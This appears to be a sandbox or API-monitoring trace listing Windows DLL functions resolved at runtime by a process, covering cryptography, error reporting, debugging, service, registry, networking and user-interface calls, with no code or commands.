DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: KERNELBASE.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: kernel32.dll/ProcessIdToSessionId
DynamicLoader: IMM32.DLL/ImmCreateContext
DynamicLoader: IMM32.DLL/ImmDestroyContext
DynamicLoader: IMM32.DLL/ImmNotifyIME
DynamicLoader: IMM32.DLL/ImmAssociateContext
DynamicLoader: IMM32.DLL/ImmReleaseContext
DynamicLoader: IMM32.DLL/ImmGetContext
DynamicLoader: IMM32.DLL/ImmGetCompositionStringA
DynamicLoader: IMM32.DLL/ImmSetCompositionStringA
DynamicLoader: IMM32.DLL/ImmGetCompositionStringW
DynamicLoader: IMM32.DLL/ImmSetCompositionStringW
DynamicLoader: IMM32.DLL/ImmSetCandidateWindow
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: KERNELBASE.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: kernel32.dll/ProcessIdToSessionId
DynamicLoader: IMM32.DLL/ImmCreateContext
DynamicLoader: IMM32.DLL/ImmDestroyContext
DynamicLoader: IMM32.DLL/ImmNotifyIME
DynamicLoader: IMM32.DLL/ImmAssociateContext
DynamicLoader: IMM32.DLL/ImmReleaseContext
DynamicLoader: IMM32.DLL/ImmGetContext
DynamicLoader: IMM32.DLL/ImmGetCompositionStringA
DynamicLoader: IMM32.DLL/ImmSetCompositionStringA
DynamicLoader: IMM32.DLL/ImmGetCompositionStringW
DynamicLoader: IMM32.DLL/ImmSetCompositionStringW
DynamicLoader: IMM32.DLL/ImmSetCandidateWindow
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/IsProcessorFeaturePresent
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptGenKey
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: CRYPTSP.dll/CryptDuplicateHash
DynamicLoader: CRYPTSP.dll/CryptEncrypt
DynamicLoader: CRYPTSP.dll/CryptExportKey
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: RASAPI32.dll/RasConnectionNotificationW
DynamicLoader: sechost.dll/NotifyServiceStatusChangeA
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: iphlpapi.DLL/GetAdaptersAddresses
DynamicLoader: DHCPCSVC.DLL/DhcpRequestParams
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: wersvc.dll/ServiceMain
DynamicLoader: wersvc.dll/SvchostPushServiceGlobals
DynamicLoader: ADVAPI32.dll/RegGetValueW
DynamicLoader: sechost.dll/ConvertStringSecurityDescriptorToSecurityDescriptorW
DynamicLoader: faultrep.dll/WerpInitiateCrashReporting
DynamicLoader: wer.dll/WerpCreateMachineStore
DynamicLoader: SHELL32.dll/SHGetFolderPathEx
DynamicLoader: ole32.dll/StringFromGUID2
DynamicLoader: profapi.dll/
DynamicLoader: SHELL32.dll/SHGetFolderPathEx
DynamicLoader: USERENV.dll/CreateEnvironmentBlock
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: SspiCli.dll/GetUserNameExW
DynamicLoader: USERENV.dll/DestroyEnvironmentBlock
DynamicLoader: LPK.dll/LpkEditControl
DynamicLoader: IMM32.dll/ImmDisableIME
DynamicLoader: PSAPI.DLL/GetModuleFileNameExW
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
DynamicLoader: VERSION.dll/GetFileVersionInfoW
DynamicLoader: VERSION.dll/VerQueryValueW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: LPK.dll/LpkEditControl
DynamicLoader: IMM32.dll/ImmDisableIME
DynamicLoader: PSAPI.DLL/GetModuleFileNameExW
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
DynamicLoader: VERSION.dll/GetFileVersionInfoW
DynamicLoader: VERSION.dll/VerQueryValueW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: wer.dll/WerpCreateIntegratorReportId
DynamicLoader: wer.dll/WerReportCreate
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: wer.dll/WerpSetIntegratorReportId
DynamicLoader: wer.dll/WerReportSetParameter
DynamicLoader: dbgeng.dll/DebugCreate
DynamicLoader: ntdll.dll/CsrGetProcessId
DynamicLoader: ntdll.dll/DbgBreakPoint
DynamicLoader: ntdll.dll/DbgPrint
DynamicLoader: ntdll.dll/DbgPrompt
DynamicLoader: ntdll.dll/DbgUiConvertStateChangeStructure
DynamicLoader: ntdll.dll/DbgUiGetThreadDebugObject
DynamicLoader: ntdll.dll/DbgUiIssueRemoteBreakin
DynamicLoader: ntdll.dll/DbgUiSetThreadDebugObject
DynamicLoader: ntdll.dll/NtAllocateVirtualMemory
DynamicLoader: ntdll.dll/NtClose
DynamicLoader: ntdll.dll/NtCreateDebugObject
DynamicLoader: ntdll.dll/NtCreateFile
DynamicLoader: ntdll.dll/NtDebugActiveProcess
DynamicLoader: ntdll.dll/NtDebugContinue
DynamicLoader: ntdll.dll/NtFreeVirtualMemory
DynamicLoader: ntdll.dll/NtOpenProcess
DynamicLoader: ntdll.dll/NtOpenThread
DynamicLoader: ntdll.dll/NtQueryInformationProcess
DynamicLoader: ntdll.dll/NtQueryInformationThread
DynamicLoader: ntdll.dll/NtQueryMutant
DynamicLoader: ntdll.dll/NtQueryObject
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/NtRemoveProcessDebug
DynamicLoader: ntdll.dll/NtResumeThread
DynamicLoader: ntdll.dll/NtSetInformationDebugObject
DynamicLoader: ntdll.dll/NtSetInformationProcess
DynamicLoader: ntdll.dll/NtSystemDebugControl
DynamicLoader: ntdll.dll/NtWaitForDebugEvent
DynamicLoader: ntdll.dll/RtlAnsiStringToUnicodeString
DynamicLoader: ntdll.dll/RtlCreateProcessParameters
DynamicLoader: ntdll.dll/RtlCreateUserProcess
DynamicLoader: ntdll.dll/RtlDestroyProcessParameters
DynamicLoader: ntdll.dll/RtlDosPathNameToNtPathName_U
DynamicLoader: ntdll.dll/RtlFindMessage
DynamicLoader: ntdll.dll/RtlFreeHeap
DynamicLoader: ntdll.dll/RtlFreeUnicodeString
DynamicLoader: ntdll.dll/RtlGetFunctionTableListHead
DynamicLoader: ntdll.dll/RtlGetUnloadEventTrace
DynamicLoader: ntdll.dll/RtlGetUnloadEventTraceEx
DynamicLoader: ntdll.dll/RtlInitAnsiString
DynamicLoader: ntdll.dll/RtlInitUnicodeString
DynamicLoader: ntdll.dll/RtlTryEnterCriticalSection
DynamicLoader: ntdll.dll/RtlUnicodeStringToAnsiString
DynamicLoader: ntdll.dll/NtOpenProcessToken
DynamicLoader: ntdll.dll/NtOpenThreadToken
DynamicLoader: ntdll.dll/NtQueryInformationToken
DynamicLoader: kernel32.dll/CloseProfileUserMapping
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/DebugActiveProcessStop
DynamicLoader: kernel32.dll/DebugBreak
DynamicLoader: kernel32.dll/DebugBreakProcess
DynamicLoader: kernel32.dll/DebugSetProcessKillOnExit
DynamicLoader: kernel32.dll/Module32First
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/Module32Next
DynamicLoader: kernel32.dll/Module32NextW
DynamicLoader: kernel32.dll/OpenThread
DynamicLoader: kernel32.dll/Process32First
DynamicLoader: kernel32.dll/Process32FirstW
DynamicLoader: kernel32.dll/Process32Next
DynamicLoader: kernel32.dll/Process32NextW
DynamicLoader: kernel32.dll/ProcessIdToSessionId
DynamicLoader: kernel32.dll/SetProcessShutdownParameters
DynamicLoader: kernel32.dll/Thread32First
DynamicLoader: kernel32.dll/Thread32Next
DynamicLoader: kernel32.dll/GetTimeZoneInformation
DynamicLoader: kernel32.dll/DuplicateHandle
DynamicLoader: kernel32.dll/Wow64GetThreadSelectorEntry
DynamicLoader: ADVAPI32.dll/CloseServiceHandle
DynamicLoader: ADVAPI32.dll/ControlService
DynamicLoader: ADVAPI32.dll/CreateServiceA
DynamicLoader: ADVAPI32.dll/CreateServiceW
DynamicLoader: ADVAPI32.dll/DeleteService
DynamicLoader: ADVAPI32.dll/EnumServicesStatusExA
DynamicLoader: ADVAPI32.dll/EnumServicesStatusExW
DynamicLoader: ADVAPI32.dll/GetEventLogInformation
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenSCManagerA
DynamicLoader: ADVAPI32.dll/OpenSCManagerW
DynamicLoader: ADVAPI32.dll/OpenServiceA
DynamicLoader: ADVAPI32.dll/OpenServiceW
DynamicLoader: ADVAPI32.dll/StartServiceA
DynamicLoader: ADVAPI32.dll/StartServiceW
DynamicLoader: ADVAPI32.dll/GetSidSubAuthority
DynamicLoader: ADVAPI32.dll/GetSidSubAuthorityCount
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeExW
DynamicLoader: VERSION.dll/GetFileVersionInfoExW
DynamicLoader: wer.dll/WerReportAddDump
DynamicLoader: wer.dll/WerpSetCallBack
DynamicLoader: wer.dll/WerReportSetUIOption
DynamicLoader: wer.dll/WerpAddRegisteredDataToReport
DynamicLoader: wer.dll/WerReportSubmit
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegGetValueW
DynamicLoader: USER32.dll/LoadStringW
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/CheckTokenMembership
DynamicLoader: USER32.dll/GetProcessWindowStation
DynamicLoader: USER32.dll/GetThreadDesktop
DynamicLoader: USER32.dll/GetUserObjectInformationW
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: SensApi.dll/IsNetworkAlive
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: RPCRT4.dll/NdrClientCall3
DynamicLoader: USER32.dll/CharUpperW
DynamicLoader: werui.dll/WerUICreate
DynamicLoader: werui.dll/WerUIStart
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: DUI70.dll/InitProcessPriv
DynamicLoader: COMCTL32.dll/LoadIconWithScaleDown
DynamicLoader: ntdll.dll/RtlRunEncodeUnicodeString
DynamicLoader: ntdll.dll/RtlInitUnicodeString
DynamicLoader: ntdll.dll/RtlRunDecodeUnicodeString
DynamicLoader: DUI70.dll/InitThread
DynamicLoader: DUser.dll/InitGadgets
DynamicLoader: USER32.dll/RegisterMessagePumpHook
DynamicLoader: DUI70.dll/?GetClassInfoPtr@CCBase@DirectUI@@SAPEAUIClassInfo@2@XZ
DynamicLoader: DUI70.dll/?GetFactoryLock@Element@DirectUI@@SAPEAU_RTL_CRITICAL_SECTION@@XZ
DynamicLoader: DUI70.dll/??0CritSecLock@DirectUI@@QEAA@PEAU_RTL_CRITICAL_SECTION@@@Z
DynamicLoader: DUI70.dll/?ClassExist@ClassInfoBase@DirectUI@@SA_NPEAPEAUIClassInfo@2@PEBQEBUPropertyInfo@2@IPEAU32@PEAUHINSTANCE__@@PEBG_N@Z
DynamicLoader: DUI70.dll/??0ClassInfoBase@DirectUI@@QEAA@XZ
DynamicLoader: DUI70.dll/?Initialize@ClassInfoBase@DirectUI@@QEAAJPEAUHINSTANCE__@@PEBG_NPEBQEBUPropertyInfo@2@I@Z
DynamicLoader: DUI70.dll/?Register@ClassInfoBase@DirectUI@@QEAAJXZ
DynamicLoader: DUI70.dll/?IsGlobal@ClassInfoBase@DirectUI@@UEBA_NXZ
DynamicLoader: DUI70.dll/?GetName@ClassInfoBase@DirectUI@@UEBAPEBGXZ
DynamicLoader: DUI70.dll/?GetModule@ClassInfoBase@DirectUI@@UEBAPEAUHINSTANCE__@@XZ
DynamicLoader: DUI70.dll/??1CritSecLock@DirectUI@@QEAA@XZ
DynamicLoader: DUI70.dll/??0CCBase@DirectUI@@QEAA@KPEBG@Z
DynamicLoader: DUI70.dll/?Initialize@CCBase@DirectUI@@QEAAJIPEAVElement@2@PEAK@Z
DynamicLoader: DUser.dll/CreateGadget
DynamicLoader: DUser.dll/SetGadgetMessageFilter
DynamicLoader: DUser.dll/SetGadgetStyle
DynamicLoader: DUI70.dll/?OnPropertyChanging@Element@DirectUI@@UEAA_NPEBUPropertyInfo@2@HPEAVValue@2@1@Z
DynamicLoader: DUI70.dll/?HandleUiaPropertyChangingListener@Element@DirectUI@@UEAAXPEBUPropertyInfo@2@@Z
DynamicLoader: DUI70.dll/?HandleUiaPropertyListener@Element@DirectUI@@UEAAXPEBUPropertyInfo@2@HPEAVValue@2@1@Z
DynamicLoader: DUI70.dll/?DirectionProp@Element@DirectUI@@SAPEBUPropertyInfo@2@XZ
DynamicLoader: DUI70.dll/?OnPropertyChanged@CCBase@DirectUI@@UEAAXPEBUPropertyInfo@2@HPEAVValue@2@1@Z
DynamicLoader: DUI70.dll/?SetFontSize@Element@DirectUI@@QEAAJH@Z
DynamicLoader: DUI70.dll/?SetWidth@Element@DirectUI@@QEAAJH@Z
DynamicLoader: DUI70.dll/?SetHeight@Element@DirectUI@@QEAAJH@Z
DynamicLoader: DUI70.dll/?EndDefer@Element@DirectUI@@QEAAXK@Z
DynamicLoader: DUI70.dll/?OnGroupChanged@Element@DirectUI@@UEAAXH_N@Z
DynamicLoader: DUser.dll/InvalidateGadget
DynamicLoader: DUI70.dll/CreateDUIWrapper
DynamicLoader: SHELL32.dll/ExtractIconExW
DynamicLoader: COMCTL32.dll/TaskDialogIndirect
DynamicLoader: COMCTL32.dll/LoadIconWithScaleDown
DynamicLoader: ntdll.dll/RtlRunEncodeUnicodeString
DynamicLoader: ntdll.dll/RtlInitUnicodeString
DynamicLoader: ntdll.dll/RtlRunDecodeUnicodeString
DynamicLoader: DUser.dll/InitGadgets
DynamicLoader: UxTheme.dll/IsThemeActive
DynamicLoader: DUser.dll/CreateGadget
DynamicLoader: DUser.dll/DisableContainerHwnd
DynamicLoader: DUser.dll/DUserFlushMessages
DynamicLoader: DUser.dll/DUserFlushDeferredMessages
DynamicLoader: DUser.dll/DeleteHandle
DynamicLoader: DUI70.dll/UnInitThread
DynamicLoader: DUser.dll/DUserFlushMessages
DynamicLoader: DUser.dll/DUserFlushDeferredMessages
DynamicLoader: DUser.dll/DeleteHandle
DynamicLoader: DUI70.dll/?MessageCallback@HWNDHost@DirectUI@@UEAAIPEAUtagGMSG@@@Z
DynamicLoader: DUI70.dll/?HandleUiaDestroyListener@Element@DirectUI@@UEAAXXZ
DynamicLoader: DUI70.dll/?OnDestroy@HWNDHost@DirectUI@@UEAAXXZ
DynamicLoader: DUI70.dll/??1CCBase@DirectUI@@UEAA@XZ
DynamicLoader: USER32.dll/UnregisterMessagePumpHook
DynamicLoader: DUI70.dll/UnInitProcessPriv
DynamicLoader: DUI70.dll/?Release@ClassInfoBase@DirectUI@@UEAAHXZ
DynamicLoader: DUI70.dll/?GetGlobalIndex@ClassInfoBase@DirectUI@@UEBAIXZ
DynamicLoader: DUI70.dll/??1ClassInfoBase@DirectUI@@UEAA@XZ
DynamicLoader: COMCTL32.dll/LoadIconWithScaleDown
DynamicLoader: ntdll.dll/RtlRunEncodeUnicodeString
DynamicLoader: ntdll.dll/RtlInitUnicodeString
DynamicLoader: ntdll.dll/RtlRunDecodeUnicodeString
DynamicLoader: USER32.dll/RegisterMessagePumpHook
DynamicLoader: USER32.dll/UnregisterMessagePumpHook
DynamicLoader: CFGMGR32.dll/CMP_UnregisterNotification
DynamicLoader: WINSTA.dll/WinStationRegisterConsoleNotification
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: RPCRT4.dll/RpcAsyncInitializeHandle
DynamicLoader: WTSAPI32.dll/WTSRegisterSessionNotification
DynamicLoader: USER32.dll/IsWindow
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: WINSTA.dll/WinStationRegisterConsoleNotification
DynamicLoader: RPCRT4.dll/Ndr64AsyncClientCall
DynamicLoader: DUI70.dll/InitProcessPriv
DynamicLoader: DUI70.dll/InitThread
DynamicLoader: USER32.dll/RegisterMessagePumpHook
DynamicLoader: DUI70.dll/?GetClassInfoPtr@Element@DirectUI@@SAPEAUIClassInfo@2@XZ
DynamicLoader: DUI70.dll/?GetFactoryLock@Element@DirectUI@@SAPEAU_RTL_CRITICAL_SECTION@@XZ
DynamicLoader: DUI70.dll/??0CritSecLock@DirectUI@@QEAA@PEAU_RTL_CRITICAL_SECTION@@@Z
DynamicLoader: DUI70.dll/?ClassExist@ClassInfoBase@DirectUI@@SA_NPEAPEAUIClassInfo@2@PEBQEBUPropertyInfo@2@IPEAU32@PEAUHINSTANCE__@@PEBG_N@Z
DynamicLoader: DUI70.dll/??0ClassInfoBase@DirectUI@@QEAA@XZ
DynamicLoader: DUI70.dll/?Initialize@ClassInfoBase@DirectUI@@QEAAJPEAUHINSTANCE__@@PEBG_NPEBQEBUPropertyInfo@2@I@Z
DynamicLoader: DUI70.dll/?Register@ClassInfoBase@DirectUI@@QEAAJXZ
DynamicLoader: DUI70.dll/?IsGlobal@ClassInfoBase@DirectUI@@UEBA_NXZ
DynamicLoader: DUI70.dll/?GetName@ClassInfoBase@DirectUI@@UEBAPEBGXZ
DynamicLoader: DUI70.dll/?GetModule@ClassInfoBase@DirectUI@@UEBAPEAUHINSTANCE__@@XZ
DynamicLoader: DUI70.dll/??1CritSecLock@DirectUI@@QEAA@XZ
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: ADVAPI32.dll/RegGetValueW
DynamicLoader: ole32.dll/CLSIDFromString
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: UxTheme.dll/IsThemeActive
DynamicLoader: UxTheme.dll/IsCompositionActive
DynamicLoader: UxTheme.dll/OpenThemeData
DynamicLoader: SHELL32.dll/SHAppBarMessage
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: SHELL32.dll/SHFileOperationW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: PROPSYS.dll/InitPropVariantFromBuffer
DynamicLoader: PROPSYS.dll/PropVariantToBuffer
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: sechost.dll/ConvertStringSecurityDescriptorToSecurityDescriptorW
DynamicLoader: srvcli.dll/NetShareGetInfo
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: netutils.dll/NetApiBufferFree
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ADVAPI32.dll/GetNamedSecurityInfoW
DynamicLoader: sechost.dll/ConvertStringSidToSidW
DynamicLoader: sechost.dll/ConvertStringSidToSidW
DynamicLoader: POWRPROF.dll/PowerSettingRegisterNotification
DynamicLoader: comctl32.dll/
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: SETUPAPI.dll/SetupDiDestroyDeviceInfoList
DynamicLoader: WINTRUST.dll/WinVerifyTrust
DynamicLoader: comctl32.dll/
DynamicLoader: sechost.dll/OpenSCManagerW
DynamicLoader: sechost.dll/OpenServiceW
DynamicLoader: sechost.dll/NotifyServiceStatusChangeW
DynamicLoader: sechost.dll/CloseServiceHandle
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ncsi.dll/NcsiIdentifyUserSpecificProxies
DynamicLoader: sechost.dll/OpenSCManagerW
DynamicLoader: sechost.dll/OpenServiceW
DynamicLoader: sechost.dll/NotifyServiceStatusChangeW
DynamicLoader: sechost.dll/CloseServiceHandle
DynamicLoader: CSCAPI.dll/OfflineFilesQueryStatus
DynamicLoader: ADVAPI32.dll/RegNotifyChangeKeyValue
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ADVAPI32.dll/RegGetValueW
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemRealloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/RegCreateKeyExW
DynamicLoader: comctl32.dll/
DynamicLoader: USER32.dll/ChangeWindowMessageFilter
DynamicLoader: webcheck.dll/SystemFunction009
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: ole32.dll/CoSetProxyBlanket
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/IsValidSid
DynamicLoader: ADVAPI32.dll/GetLengthSid
DynamicLoader: ADVAPI32.dll/CopySid
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: NSI.dll/NsiAllocateAndGetTable
DynamicLoader: CFGMGR32.dll/CM_Open_Class_Key_ExW
DynamicLoader: IPHLPAPI.DLL/ConvertInterfaceGuidToLuid
DynamicLoader: IPHLPAPI.DLL/GetIfEntry2
DynamicLoader: IPHLPAPI.DLL/GetIpForwardTable2
DynamicLoader: IPHLPAPI.DLL/GetIpNetEntry2
DynamicLoader: IPHLPAPI.DLL/FreeMibTable
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: NSI.dll/NsiFreeTable
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/BSTR_UserSize
DynamicLoader: OLEAUT32.dll/BSTR_UserMarshal
DynamicLoader: OLEAUT32.dll/BSTR_UserUnmarshal
DynamicLoader: OLEAUT32.dll/BSTR_UserFree
DynamicLoader: OLEAUT32.dll/VARIANT_UserSize
DynamicLoader: OLEAUT32.dll/VARIANT_UserMarshal
DynamicLoader: OLEAUT32.dll/VARIANT_UserUnmarshal
DynamicLoader: OLEAUT32.dll/VARIANT_UserFree
DynamicLoader: OLEAUT32.dll/LPSAFEARRAY_UserSize
DynamicLoader: OLEAUT32.dll/LPSAFEARRAY_UserMarshal
DynamicLoader: OLEAUT32.dll/LPSAFEARRAY_UserUnmarshal
DynamicLoader: OLEAUT32.dll/LPSAFEARRAY_UserFree
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: comctl32.dll/DPA_Create
DynamicLoader: comctl32.dll/DPA_InsertPtr
DynamicLoader: PROPSYS.dll/VariantToPropVariant
DynamicLoader: OLEAUT32.dll/
DynamicLoader: SSPICLI.DLL/GetUserNameExW
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: fxsst.dll/FaxMonitorStartup
DynamicLoader: slc.dll/SLGetWindowsInformationDWORD
DynamicLoader: ole32.dll/StringFromGUID2
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: fxsst.dll/IsFaxMessage
DynamicLoader: fxsst.dll/FaxMonitorShutdown
DynamicLoader: slc.dll/SLGetWindowsInformationDWORD
DynamicLoader: POWRPROF.dll/PowerSettingRegisterNotification
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
DynamicLoader: VERSION.dll/GetFileVersionInfoW
DynamicLoader: VERSION.dll/VerQueryValueW
DynamicLoader: ADVAPI32.dll/RegNotifyChangeKeyValue
DynamicLoader: sechost.dll/OpenSCManagerW
DynamicLoader: sechost.dll/OpenServiceW
DynamicLoader: sechost.dll/QueryServiceStatus
DynamicLoader: sechost.dll/CloseServiceHandle
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/CoSetProxyBlanket
DynamicLoader: OLEAUT32.dll/
DynamicLoader: Wlanapi.dll/WlanOpenHandle
DynamicLoader: OLEAUT32.dll/BSTR_UserUnmarshal64
DynamicLoader: sechost.dll/OpenSCManagerW
DynamicLoader: sechost.dll/OpenServiceW
DynamicLoader: sechost.dll/QueryServiceConfigW
DynamicLoader: sechost.dll/CloseServiceHandle
DynamicLoader: sechost.dll/QueryServiceStatus
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: RPCRT4.dll/RpcBindingSetOption
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcAsyncInitializeHandle
DynamicLoader: RPCRT4.dll/NdrClientCall3
DynamicLoader: RPCRT4.dll/Ndr64AsyncClientCall
DynamicLoader: WS2_32.dll/
DynamicLoader: WS2_32.dll/
DynamicLoader: sechost.dll/OpenSCManagerW
DynamicLoader: sechost.dll/OpenServiceW
DynamicLoader: sechost.dll/QueryServiceStatus
DynamicLoader: sechost.dll/QueryServiceConfigW
DynamicLoader: sechost.dll/CloseServiceHandle
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/NdrClientCall3
DynamicLoader: CRYPTBASE.dll/SystemFunction041
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegGetValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/IsValidSid
DynamicLoader: ADVAPI32.dll/GetLengthSid
DynamicLoader: ADVAPI32.dll/CopySid
DynamicLoader: SHELL32.dll/SHGetFolderPathW
DynamicLoader: SHELL32.dll/SHGetFolderPathEx
DynamicLoader: ntdll.dll/RtlDllShutdownInProgress
DynamicLoader: CRYPTBASE.dll/SystemFunction040
DynamicLoader: comctl32.dll/DPA_Create
DynamicLoader: comctl32.dll/DPA_Search
DynamicLoader: comctl32.dll/DPA_InsertPtr
DynamicLoader: WSCAPI.dll/WscGetSecurityProviderHealth
DynamicLoader: comctl32.dll/LoadIconMetric
DynamicLoader: WINTRUST.dll/DllCanUnloadNow
DynamicLoader: WINTRUST.dll/CryptSIPPutSignedDataMsg
DynamicLoader: pcwum.dll/PerfDeleteInstance
DynamicLoader: pcwum.dll/PerfStopProvider
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/WmiCloseBlock
DynamicLoader: PROPSYS.dll/PropVariantToVariant
DynamicLoader: ole32.dll/CoDisconnectObject
